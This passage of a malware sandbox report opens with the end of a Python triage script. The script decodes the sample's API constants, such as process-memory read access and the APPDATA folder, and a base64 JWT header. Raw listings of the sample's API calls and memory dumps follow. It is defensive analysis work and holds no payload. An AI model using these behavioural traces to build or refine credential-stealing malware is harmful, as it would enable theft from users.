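CSIDL_NAMES = {0x1A: "CSIDL_APPDATA"}


def decode_process_access(mask):
    """Name the known bits of an OpenProcess access mask; leftover bits stay as hex."""
    names = [name for bit, name in PROCESS_ACCESS_BITS.items() if mask & bit]
    rest = mask & ~sum(PROCESS_ACCESS_BITS)
    if rest:
        names.append(f"0x{rest:X}")
    return names


def annotate(call):
    """Return the analyst-facing meaning of the constant arguments, if any."""
    if call.name == "OpenProcess" and call.args and call.args[0] is not None:
        return "|".join(decode_process_access(call.args[0]))
    if call.name == "SHGetFolderPathA" and len(call.args) > 1 and call.args[1] is not None:
        return CSIDL_NAMES.get(call.args[1], f"CSIDL 0x{call.args[1]:X}")
    return ""


def decode_hex_string(hex_text):
    """Hex bytes -> ASCII; the ASCII is unpadded base64, so pad and decode it to JSON."""
    raw = bytes.fromhex(hex_text.replace(" ", ""))
    ascii_text = raw.decode("ascii")
    padded = ascii_text + "=" * (-len(ascii_text) % 4)
    decoded = base64.b64decode(padded).decode("utf-8")
    return ascii_text, json.loads(decoded)


def triage(lines=REPORT_API_LINES):
    """Map each API name on the page to the decoded meaning of its constant arguments."""
    return {call.name: annotate(call) for call in (parse_api_line(l) for l in lines)}


if __name__ == "__main__":
    for name, meaning in triage().items():
        print(f"{name:22s} {meaning}")
    text, header = decode_hex_string(REPORT_HEX_STRING)
    print(text, "->", header)
```

                              Running it shows OpenProcess resolving to PROCESS_VM_READ|PROCESS_QUERY_INFORMATION, SHGetFolderPathA to CSIDL_APPDATA, and the hex string to the base64 text eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0, which decodes to the JSON object {"typ": "JWT", "alg": "EdDSA"}. The report itself does not say what the sample does with that string; only the decoding is asserted here.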
                              APIs
                              • __getptd.LIBCMT ref: 00E58FDD
                                • Part of subcall function 00E587FF: __amsg_exit.LIBCMT ref: 00E5880F
                              • __getptd.LIBCMT ref: 00E58FF4
                              • __amsg_exit.LIBCMT ref: 00E59002
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00E59026
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              APIs
                              • lstrlen.KERNEL32(------,00E35BEB), ref: 00E5731B
                              • lstrcpy.KERNEL32(00000000), ref: 00E5733F
                              • lstrcat.KERNEL32(?,------), ref: 00E57349
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Similarity
                              • API ID: lstrcatlstrcpylstrlen
                              • String ID: ------
                              APIs
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E43422
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4344B
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E43471
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E43497
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47C94
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47CAF
                                • Part of subcall function 00E47D40: std::_Xinvalid_argument.LIBCPMT ref: 00E47D58
                                • Part of subcall function 00E47D40: std::_Xinvalid_argument.LIBCPMT ref: 00E47D76
                                • Part of subcall function 00E47D40: std::_Xinvalid_argument.LIBCPMT ref: 00E47D91
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: string too long
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 00E36F74
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E36F7B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID: @
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00E515A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E515D9
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E51611
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E51649
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              APIs
                                • Part of subcall function 00E31610: lstrcpy.KERNEL32(00000000), ref: 00E3162D
                                • Part of subcall function 00E31610: lstrcpy.KERNEL32(00000000,?), ref: 00E3164F
                                • Part of subcall function 00E31610: lstrcpy.KERNEL32(00000000,?), ref: 00E31671
                                • Part of subcall function 00E31610: lstrcpy.KERNEL32(00000000,?), ref: 00E31693
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00E3162D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3164F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31671
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31693
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Similarity
                              • API ID: lstrcpy
                              • String ID: